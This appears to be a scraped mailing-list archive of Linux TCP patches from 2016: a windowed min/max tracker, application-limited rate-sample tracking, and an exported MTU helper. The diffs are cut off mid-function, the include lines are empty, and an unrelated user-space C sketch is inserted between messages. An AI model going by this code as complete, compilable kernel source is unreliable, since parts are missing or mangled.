+   struct minmax_sample val = { .t = t, .v = meas };
+
+   m->s[2] = m->s[1] = m->s[0] = val;
+   return m->s[0].v;
+}
+
+u32 minmax_running_max(struct minmax *m, u32 win, u32 t, u32 meas);
+u32 minmax_running_min(struct minmax *m, u32 win, u32 t, u32 meas);
+
+#endif
diff --git a/lib/Makefile b/lib/Makefile
index 5dc77a8..df747e5 100644
--- a/lib/Makefile
+++ b/lib/Makefile
@@ -22,7 +22,7 @@ lib-y := ctype.o string.o vsprintf.o cmdline.o \
 sha1.o chacha20.o md5.o irq_regs.o argv_split.o \
 flex_proportions.o ratelimit.o show_mem.o \
 is_single_threaded.o plist.o decompress.o kobject_uevent.o \
-earlycpio.o seq_buf.o nmi_backtrace.o nodemask.o
+earlycpio.o seq_buf.o nmi_backtrace.o nodemask.o win_minmax.o
 
 lib-$(CONFIG_MMU) += ioremap.o
 lib-$(CONFIG_SMP) += cpumask.o
diff --git a/lib/win_minmax.c b/lib/win_minmax.c
new file mode 100644
index 0000000..c8420d4
--- /dev/null
+++ b/lib/win_minmax.c
@@ -0,0 +1,98 @@
+/**
+ * lib/minmax.c: windowed min/max tracker
+ *
+ * Kathleen Nichols' algorithm for tracking the minimum (or maximum)
+ * value of a data stream over some fixed time interval.  (E.g.,
+ * the minimum RTT over the past five minutes.) It uses constant
+ * space and constant time per update yet almost always delivers
+ * the same minimum as an implementation that has to keep all the
+ * data in the window.
+ *
+ * The algorithm keeps track of the best, 2nd best & 3rd best min
+ * values, maintaining an invariant that the measurement time of
+ * the n'th best >= n-1'th best. It also makes sure that the three
+ * values are widely separated in the time window since that bounds
+ * the worse case error when that data is monotonically increasing
+ * over the window.
+ *
+ * Upon getting a new min, we can forget everything earlier because
+ * it has no value - the new min is <= everything else in the window
+ * by definition and it's the most recent. So we restart fresh on
+ * every new min and overwrites 2nd & 3rd choices. The same property
+ * holds for 2nd & 3rd best.
+ */
+#include 
+#include 
+
+/* As time advances, update the 1st, 2nd, and 3rd choices. */
+static u32 minmax_subwin_update(struct minmax *m, u32 win,
+   const struct minmax_sample *val)
+{
+   u32 dt = val->t - m->s[0].t;
+
+   if (unlikely(dt > win)) {
+   /*
+* Passed entire window without a new val so make 2nd
+* choice the new val & 3rd choice the new 2nd choice.
+* we may have to iterate this since our 2nd choice
+* may also be outside the window (we checked on entry
+* that the third choice was in the window).
+*/
+   m->s[0] = m->s[1];
+   m->s[1] = m->s[2];
+

[PATCH v3 net-next 08/16] tcp: track application-limited rate samples

2016-09-18 Thread Neal Cardwell

From: Soheil Hassas Yeganeh 

This commit adds code to track whether the delivery rate represented
by each rate_sample was limited by the application.

Upon each transmit, we store in the is_app_limited field in the skb a
boolean bit indicating whether there is a known "bubble in the pipe":
a point in the rate sample interval where the sender was
application-limited, and did not transmit even though the cwnd and
pacing rate allowed it.

This logic marks the flow app-limited on a write if *all* of the
following are true:

  1) There is less than 1 MSS of unsent data in the write queue
 available to transmit.

  2) There is no packet in the sender's queues (e.g. in fq or the NIC
 tx queue).

  3) The connection is not limited by cwnd.

  4) There are no lost packets to retransmit.

The tcp_rate_check_app_limited() code in tcp_rate.c determines whether
the connection is application-limited at the moment. If the flow is
application-limited, it sets the tp->app_limited field. If the flow is
application-limited then that means there is effectively a "bubble" of
silence in the pipe now, and this silence will be reflected in a lower
bandwidth sample for any rate samples from now until we get an ACK
indicating this bubble has exited the pipe: specifically, until we get
an ACK for the next packet we transmit.

When we send every skb we record in scb->tx.is_app_limited whether the
resulting rate sample will be application-limited.

The code in tcp_rate_gen() checks to see when it is safe to mark all
known application-limited bubbles of silence as having exited the
pipe. It does this by checking to see when the delivered count moves
past the tp->app_limited marker. At this point it zeroes the
tp->app_limited marker, as all known bubbles are out of the pipe.

We make room for the tx.is_app_limited bit in the skb by borrowing a
bit from the in_flight field used by NV to record the number of bytes
in flight. The receive window in the TCP header is 16 bits, and the
max receive window scaling shift factor is 14 (RFC 1323). So the max
receive window offered by the TCP protocol is 2^(16+14) = 2^30. So we
only need 30 bits for the tx.in_flight used by NV.

Signed-off-by: Van Jacobson 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Nandita Dukkipati 
Signed-off-by: Eric Dumazet 
Signed-off-by: Soheil Hassas Yeganeh 
---
 include/linux/tcp.h  |  1 +
 include/net/tcp.h|  6 +-
 net/ipv4/tcp.c   |  8 
 net/ipv4/tcp_minisocks.c |  3 +++
 net/ipv4/tcp_rate.c  | 29 -
 5 files changed, 45 insertions(+), 2 deletions(-)

diff --git a/include/linux/tcp.h b/include/linux/tcp.h
index c50e6ae..fdcd00f 100644
--- a/include/linux/tcp.h
+++ b/include/linux/tcp.h
@@ -268,6 +268,7 @@ struct tcp_sock {
u32 prr_out;/* Total number of pkts sent during Recovery. */
u32 delivered;  /* Total data packets delivered incl. rexmits */
u32 lost;   /* Total data packets lost incl. rexmits */
+   u32 app_limited;/* limited until "delivered" reaches this val */
struct skb_mstamp first_tx_mstamp;  /* start of window send phase */
struct skb_mstamp delivered_mstamp; /* time we reached "delivered" */
 
diff --git a/include/net/tcp.h b/include/net/tcp.h
index b261c89..a69ed7f 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -764,7 +764,9 @@ struct tcp_skb_cb {
union {
struct {
/* There is space for up to 24 bytes */
-   __u32 in_flight;/* Bytes in flight when packet sent */
+   __u32 in_flight:30,/* Bytes in flight at transmit */
+ is_app_limited:1, /* cwnd not fully used? */
+ unused:1;
/* pkts S/ACKed so far upon tx of skb, incl retrans: */
__u32 delivered;
/* start of send pipeline phase */
@@ -883,6 +885,7 @@ struct rate_sample {
int  losses;/* number of packets marked lost upon ACK */
u32  acked_sacked;  /* number of packets newly (S)ACKed upon ACK */
u32  prior_in_flight;   /* in flight before this ACK */
+   bool is_app_limited;/* is sample from packet with bubble in pipe? */
bool is_retrans;/* is sample from retransmission? */
 };
 
@@ -978,6 +981,7 @@ void tcp_rate_skb_delivered(struct sock *sk, struct sk_buff *skb,
struct rate_sample *rs);
 void tcp_rate_gen(struct sock *sk, u32 delivered, u32 lost,
  struct skb_mstamp *now, struct rate_sample *rs);
+void tcp_rate_check_app_limited(struct sock *sk);
 
 /* These functions determine how the current flow behaves in respect of SACK
  * handling. SACK is negotiated with the peer, and therefore it can vary
diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
index 53798e1..0327a44 100644
--- a/net/ipv4/tcp.c
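
The bit-budget argument in the commit message (a 16-bit window field shifted by at most 14 fits in 30 bits) can be checked with a short user-space sketch. The demo_tx_cb struct below only mirrors the bit-field split shown in the tcp_skb_cb hunk; the names are hypothetical and this is not the kernel structure.

```c
#include <assert.h>
#include <stdint.h>

/* Largest window TCP can advertise: 16-bit field, shift of at most 14. */
#define DEMO_MAX_WINDOW ((uint32_t)UINT16_MAX << 14)

/* Mirrors the 30 + 1 + 1 bit split from the patch; illustrative only. */
struct demo_tx_cb {
	unsigned int in_flight:30,      /* bytes in flight at transmit */
		     is_app_limited:1,  /* sample taken with a bubble in pipe */
		     unused:1;
};

/* Record per-packet transmit state; in_flight must fit in 30 bits. */
static struct demo_tx_cb demo_record_tx(uint32_t in_flight, int app_limited)
{
	struct demo_tx_cb cb = { 0 };

	assert(in_flight <= DEMO_MAX_WINDOW);
	cb.in_flight = in_flight;
	cb.is_app_limited = app_limited ? 1 : 0;
	return cb;
}
```

The largest advertised window, 65535 << 14 = 1073725440, is below 2^30 = 1073741824, so storing it in the 30-bit field loses nothing and leaves two bits free for flags.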

[PATCH v3 net-next 12/16] tcp: export tcp_mss_to_mtu() for congestion control modules

2016-09-18 Thread Neal Cardwell

Export tcp_mss_to_mtu(), so that congestion control modules can use
this to help calculate a pacing rate.

Signed-off-by: Van Jacobson 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Nandita Dukkipati 
Signed-off-by: Eric Dumazet 
Signed-off-by: Soheil Hassas Yeganeh 
---
 net/ipv4/tcp_output.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
index 0bf3d48..7d025a7 100644
--- a/net/ipv4/tcp_output.c
+++ b/net/ipv4/tcp_output.c
@@ -1362,6 +1362,7 @@ int tcp_mss_to_mtu(struct sock *sk, int mss)
}
return mtu;
 }
+EXPORT_SYMBOL(tcp_mss_to_mtu);
 
 /* MTU probing init per socket */
 void tcp_mtup_init(struct sock *sk)
-- 
2.8.0.rc3.226.g39d4020
